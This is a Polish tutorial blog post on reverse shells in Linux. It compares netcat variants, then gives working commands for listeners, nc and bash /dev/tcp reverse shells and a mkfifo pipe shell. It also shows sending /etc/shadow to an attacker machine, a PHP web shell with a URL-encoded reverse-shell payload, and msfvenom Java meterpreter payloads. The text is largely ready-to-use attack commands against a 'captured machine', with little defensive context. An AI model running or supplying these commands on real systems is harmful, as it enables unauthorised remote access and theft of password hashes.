Co to takiego jest i do czego służy Reverse Shell?

Reverse shell (czyli odwrócone połączenie powłoki) to technika często wykorzystywana w dziedzinie cyberbezpieczeństwa. Polega ona na ustanowieniu połączenia zdalnego z systemem komputerowym i zdalnym uruchomieniu powłoki (w wypadku Linuxa Sh/Bash). W tradycyjnym połączeniu zdalnym, atakujący nawiązuje połączenie z ofiarą. Natomiast w przypadku Reverse Shell, to ofiara nawiązuje połączenie z atakującym. Zajmiemy się głównie Reverse Shellem.

Jakich programów do tego potrzebuje?

Zajmiemy się tutaj Linuxem. Opisze programy na ten system, chociaż na Windowsa też jest do tego program o nazwie Nc. Niestety wersji Nc na Linuxa jest dosyć dużo i mogą wprowadzić pewne zamieszanie:

GNU Netcat (netcat-traditional)

Ta wersja jest najbardziej - jakby to powiedzieć - pierwotna. Program został napisany przez osobę przedstawiającą się jako Hobbit. Ciekawostką jest to, że nie działa wyświetlenie helpa przez wpisanie nc –help. Spotykany jest tutaj dosyć niski numer wersji (u mnie na rok 2023 - [v1.10-47]). W odróżnieniu od OpenBSD Netcat (netcat-openbsd) ta wersja posiada przełączniki -c lub -e, pozwalające uruchomić i przekierować Basha, Sh itd. Pakiet, który jest w Debianie nazywa się netcat-traditional. Po wykonaniu komendy:

nc -help 

Dostajemy mniej więcej taki wynik:

[v1.10-47]
connect to somewhere:  nc [-options] hostname port[s] [ports] ... 
listen for inbound:   nc -l -p port [-options] [hostname] [port]
options:
    -c shell commands    as `-e'; use /bin/sh to exec [dangerous!!]
    -e filename       program to exec after connect [dangerous!!]
    -b           allow broadcasts
    -g gateway       source-routing hop point[s], up to 8
    -G num         source-routing pointer: 4, 8, 12, ...
    -h           this cruft
    -i secs         delay interval for lines sent, ports scanned
    -k           set keepalive option on socket
    -l           listen mode, for inbound connects
    -n           numeric-only IP addresses, no DNS
    -o file         hex dump of traffic
    -p port         local port number
    -r           randomize local and remote ports
    -q secs         quit after EOF on stdin and delay of secs
    -s addr         local source address
    -T tos         set Type Of Service
    -t           answer TELNET negotiation
    -u           UDP mode
    -v           verbose [use twice to be more verbose]
    -w secs         timeout for connects and final net reads
    -C           Send CRLF as line-ending
    -z           zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

Port z pakietu Nmap posiada wysoki numer (7.70) i działa wpisanie nc –help. Po tym też można poznać, jaka to jest wersja, chociaż nie tylko.

OpenBSD Netcat (netcat-openbsd)

Ta wersja została przepisana z wersji tradycyjnej, dodano parę funkcji, ale niestety usunięto przełączniki -c i -e. Ma to związek z tym, że ta implementacja jest jest silnie związana z bezpieczeństwem. Dodano bardzo przydatny przełącznik -N, który się przydaje przy przesyłaniu plików. Pakiet pod Debiana nazywa się netcat-openbsd. Po wykonaniu komendy (–help do końca nie działa) widzimy:

nc -help
szikers@opensuse15-test1:~> nc -help 
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
     [-m minttl] [-O length] [-P proxy_username] [-p source_port]
     [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
     [-X proxy_protocol] [-x proxy_address[:port]]      [destination] [port]
    Command Summary:
        -4       Use IPv4
        -6       Use IPv6
        -b       Allow broadcast
        -C       Send CRLF as line-ending
        -D       Enable the debug socket option
        -d       Detach from stdin
        -F       Pass socket fd
        -h       This help text
        -I length    TCP receive buffer length
        -i interval   Delay interval for lines sent, ports scanned
        -k       Keep inbound sockets open for multiple connects
        -l       Listen mode, for inbound connects
        -M ttl     Outgoing TTL / Hop Limit
        -m minttl    Minimum incoming TTL / Hop Limit
        -N       Shutdown the network socket after EOF on stdin
        -n       Suppress name/port resolutions
        -O length    TCP send buffer length
        -P proxyuser  Username for proxy authentication
        -p port     Specify local port for remote connects
        -q secs     quit after EOF on stdin and delay of secs
        -r       Randomize remote ports
        -S       Enable the TCP MD5 signature option
        -s source    Local source address
        -T keyword   TOS value
        -t       Answer TELNET negotiation
        -U       Use UNIX domain socket
        -u       UDP mode
        -V rtable    Specify alternate routing table
        -v       Verbose
        -W recvlimit  Terminate after receiving a number of packets
        -w timeout   Timeout for connects and final net reads
        -X proto    Proxy protocol: "4", "5" (SOCKS) or "connect"
        -x addr[:port] Specify proxy address and port
        -Z       DCCP mode
        -z       Zero-I/O mode [used for scanning]
    Port numbers can be individual or ranges: lo-hi [inclusive]

Nmap-ncat (od autora Network Mapper)

Żeby jeszcze bardziej namieszać, jest jeszcze jest Ncat od osoby, która napisała program Nmap (Network Mapper), czyli od Gordona Lyona. Pogram charakteryzuje się dosyć wysoką wersją (w porównaniu do pierwowzoru). Na szczęście (albo i nie) są przełączniki -c i -e pozwalające uruchomić Bash lub inną konsolę. Na Redhacie pakiet nazywa się nmap-ncat, zaś na Debianie po prostu ncat. Zauważyłem, że na Debianie możemy mieć dwa Netcaty. Jeżeli są dwa, to ten pierwotny nazywa nc.traditional, drugi zaś normalnie nc. Help naszego programu od Nmapa wygląda tak:

nc --help
Ncat 7.70 ( https://nmap.org/ncat )
Usage: ncat [options] [hostname] [port]

Options taking a time assume seconds. Append 'ms' for milliseconds,
's' for seconds, 'm' for minutes, or 'h' for hours (e.g. 500ms).
 -4             Use IPv4 only
 -6             Use IPv6 only
 -U, --unixsock       Use Unix domain sockets only
 -C, --crlf         Use CRLF for EOL sequence
 -c, --sh-exec <command>  Executes the given command via /bin/sh
 -e, --exec <command>    Executes the given command
   --lua-exec <filename> Executes the given Lua script
 -g hop1[,hop2,...]     Loose source routing hop points (8 max)
 -G <n>           Loose source routing hop pointer (4, 8, 12, ...)
 -m, --max-conns <n>    Maximum <n> simultaneous connections
 -h, --help         Display this help screen
 -d, --delay <time>     Wait between read/writes
 -o, --output <filename>  Dump session data to a file
 -x, --hex-dump <filename> Dump session data as hex to a file
 -i, --idle-timeout <time> Idle read/write timeout
 -p, --source-port port   Specify source port to use
 -s, --source addr     Specify source address to use (doesn't affect -l)
 -l, --listen        Bind and listen for incoming connections
 -k, --keep-open      Accept multiple connections in listen mode
 -n, --nodns        Do not resolve hostnames via DNS
 -t, --telnet        Answer Telnet negotiations
 -u, --udp         Use UDP instead of default TCP
   --sctp         Use SCTP instead of default TCP
 -v, --verbose       Set verbosity level (can be used several times)
 -w, --wait <time>     Connect timeout
 -z             Zero-I/O mode, report connection status only
   --append-output    Append rather than clobber specified output files
   --send-only      Only send data, ignoring received; quit on EOF
   --recv-only      Only receive data, never send anything
   --allow        Allow only given hosts to connect to Ncat
   --allowfile      A file of hosts allowed to connect to Ncat
   --deny         Deny given hosts from connecting to Ncat
   --denyfile       A file of hosts denied from connecting to Ncat
   --broker        Enable Ncat's connection brokering mode
   --chat         Start a simple Ncat chat server
   --proxy <addr[:port]> Specify address of host to proxy through
   --proxy-type <type>  Specify proxy type ("http" or "socks4" or "socks5")
   --proxy-auth <auth>  Authenticate with HTTP or SOCKS proxy server
   --ssl         Connect or listen with SSL
   --ssl-cert       Specify SSL certificate file (PEM) for listening
   --ssl-key       Specify SSL private key (PEM) for listening
   --ssl-verify      Verify trust and domain name of certificates
   --ssl-trustfile    PEM file containing trusted SSL certificates
   --ssl-ciphers     Cipherlist containing SSL ciphers to use
   --ssl-alpn       ALPN protocol list to use.
   --version       Display Ncat's version information and exit

Jak to jest w praktyce?

Uff, wstęp już przeszliśmy, czas przejść do działania.

Nasłuchiwanie

Na szczęście aby nasłuchiwać, nie trzeba się przejmować z jakiej rodziny jest nc. Użycie tego programu, mimo że z dwóch rodzin, wygląda to podobnie. Później jeszcze opiszę moduł nasłuchujący z Metasploita.

Netcat (tradycyjny i OpenBSD)

Wpisujemy

nc -lvn -p 1337

Pokazuje się komunikat:

Listening on 0.0.0.0 1337

Jeżeli się połączymy to powinniśmy widzieć mniej więcej taką odpowiedź:

Connection received on 172.x.x.xx 37052

Metasploit - moduł exploit(multi/handler)

Włączamy Metasploit i uruchamiamy poniższe komendy:

msf6 exploit(multi/handler) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lport 1337
lport => 1337
msf6 exploit(multi/handler) > set lhost eth0
lhost => 172.16.1.89
msf6 exploit(multi/handler) > run -j

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.1.89:1337 

Jeżeli wszystko poszło dobrze:

msf6 exploit(multi/handler) > [*] Command shell session 2 opened (172.16.1.89:1337 -> 172.16.1.33:58520) at 2023-12-19 18:29:07 +0100

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

 Id Name Type       Information Connection
 -- ---- ----       ----------- ----------
 2     shell sparc/bsd        172.16.1.89:1337 -> 172.16.1.33:58520 (172.16.1.33)
 msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

Powłoką na Metasploicie nie będziemy się zajmować, podałem tylko przykład jako ciekawostkę. Wróćmy jednak do nc wysyłającego shell.

Wysyłanie

I tutaj zaczynają się niestety schody. Nc Nc w tym wypadku nierówny.

GNU Netcat (netcat-traditional)

Tutaj możemy po prostu tak wysłać konsolę (podobnie jest w nc od Nmapa)

nc 172.16.1.89 1337 -c /bin/bash

Jeżeli wszystko wykonaliśmy poprawnie powinno być połączenie.

connect to [172.16.1.89] from (UNKNOWN) [172.16.1.33] 44962

OpenBSD Netcat (netcat-openbsd)

Tu jest już gorzej. Nc z OpenBSD nie ma przełącznika -c ani -e, co pozwala uruchomić shell, ale na szczęście jest opisane w podręczniku, jak zrobić przekierowanie z Basha (oczywiście ta opcja też działa z nc traditional).

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash 2>&1 | nc 172.16.1.89 1337 > /tmp/f

Mam połączenie, ale i nie mam znaku zachęty

Nie ma sprawy, można to naprawić na parę sposobów. Na konsoli gdzie odbieramy połączenie wklepujemy.

Python

python3 -c 'import pty;pty.spawn("/bin/bash")'

Script

script /dev/null -c /bin/bash
Script started, file is /dev/null
[root@rocky8-test1 ~]# 

Polecam ten drugi sposób z uruchomieniem programu Script

Ale skąd te krzaki?

[root@rocky8-test1 ~]# ^[[D^[[D^[[D^[[D

Po wejściu na konsolę, podczas ruszania strzałkami są krzaki. Również po naciśnięciu ctrl+c wychodzi się z konsoli. Jest na to rada. Kiedy uruchamiamy nasz Reverse Shell przez bash -i &> /dev/tcp/172.16.1.89/1337 0>&1, lub podanymi wcześniej sposobami należy pamiętać o wpisaniu script /dev/null -c /bin/bash. Więc kiedy jesteśmy już w konsoli wciskamy ctrl+z (zadanie w tle)

[root@rocky8-test1 ~]# ^Z   
[1]+ Zatrzymano       nc -lvnp 1337

Następnie:

stty raw -echo; fg
reset xterm

Teraz można dowolnie sterować strzałkami (ctrl+c nie zamyka konsoli):

[root@rocky8-test1 ~]# ^C ^C

Aby polepszyć wygląd i wczytać zmienne można dopisać:

export TERM=xterm-256color
export SHELL=bash
stty rows 44 columns 185
source /etc/skel/.bashrc

Wyszedłem z konsoli, ale nic nie mogę napisać

Spoko, wystarczy że wpiszesz:

stty sane

Na przejętej maszynie nie ma Nc

Nie przejmuj się, możesz Basha użyć do przerzucenia Basha :smiley: Jednak ta metoda działa już na przejętej maszynie

bash -i &> /dev/tcp/172.16.1.89/1337 0>&1

Co jeszcze mogę zrobić z Nc?

Wysyłanie plików

Możesz przerzucić plik - akurat tutaj polecam Nc w wersji OpenBSD - w ten sposób:

Przejęta maszyna

Jak już wcześniej wspomniałem przełącznik -N działa tylko na Nc z OpenBSD. Po przesłaniu pliku program sam kończy prace. Niestety w przypadku innego - tradycyjnego, z pakietu nmap - trzeba po wysłaniu pliku, wcisnąć ctrl+c aby zakończyć.

cat /etc/shadow | nc -vN 172.16.1.89 1337 
Connection to 172.16.1.89 1337 port [tcp/menandmice-dns] succeeded!

Nasza maszyna

nc -lvnp 1337 > shadow

Przekierowanie portów

Tak, tutaj też można użyć Nc, chociaż najlepiej się do tego nadaje Socat. Poniżej przykład użycia:

nc -nlktp 8001 -c "nc 127.0.0.1 8000"

PHP

Załóżmy, że mamy dostęp do jakiegoś serwera, np. o ip 172.16.1.123 gdzie możemy wrzucać pliki z rozszerzeniem php (http://server/uploads/). Naszym celem jest połączyć się stamtąd na naszą maszynę. Można to zrobić w ten sposób:

shell.php

Należy stworzyć plik shell.php:

<?php
echo shell_exec($_REQUEST['cmd']);
?>

Nasłuchiwanie

Włączamy jak zwykle u siebie nasłuchiwanie:

nc -lvp 1337

Payload

Przygotowujemy payload:

php -r '$sock=fsockopen("172.16.1.89",1337);exec("bash <&3 >&3 2>&3");'

Konwertujemy na format URL. Można to zrobić na stronie urlencoder. Wychodzi coś takiego:

php%20-r%20%27%24sock%3Dfsockopen%28%22172.16.1.89%22%2C1337%29%3Bexec%28%22bash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

Doklejamy payload do do naszego linku:

http://172.16.1.123/uploads/shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22172.16.1.89%22%2C1337%29%3Bexec%28%22bash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

Jezeli wszystko przebiegło poprawnie powinniśmy mieć dostęp do Shella.

Inne payloady

Tworzenie Reverse Shella można przeprowadzać ręcznie, ale efektywnym podejściem jest skorzystanie z polecenia msfvenom, dostępnego w ramach wspomnianego wcześniej Metasploita. Poniżej przedstawiam przykład uruchomienia Reverse Shella poprzez Javę. Aby stworzyć odpowiedni payload, skorzystaj z poniższego polecenia:

Metasploit

Tworzenie ładunku

msfvenom --platform java -f jar -p java/meterpreter/reverse_tcp LPORT=1337 LHOST=172.16.1.89 -o shell.jar

Ustawienia na Metasploicie

use exploit/multi/handler
set payload payload/java/shell/reverse_tcp
set lport 1337

Nc

Tworzenie ładunku

msfvenom -p java/shell_reverse_tcp LPORT=1337 -f jar -o shell.jar

Nasłuchiwanie

nc -lvn -p 1337

Odpalamy ładunek na przejętym koncie poniższym poleceniem (Tu już nie jest ważny listener):

/usr/bin/java -jar shell.jar

Trochę jest zmylający parametr LHOST, bo to nie jest do końca localhost, ale w tym przypadku jest to adres gdzie łączy się nasz ładunek.

Koniec

I to już koniec. Mam nadzieję, że wyjaśniłem trochę sprawę. Na koniec bonus w postaci linka do generatora Shelli. Jeżeli masz coś ciekawego do dodania, lub znalazłeś poważny błąd, daj znać.

Zostaw komentarz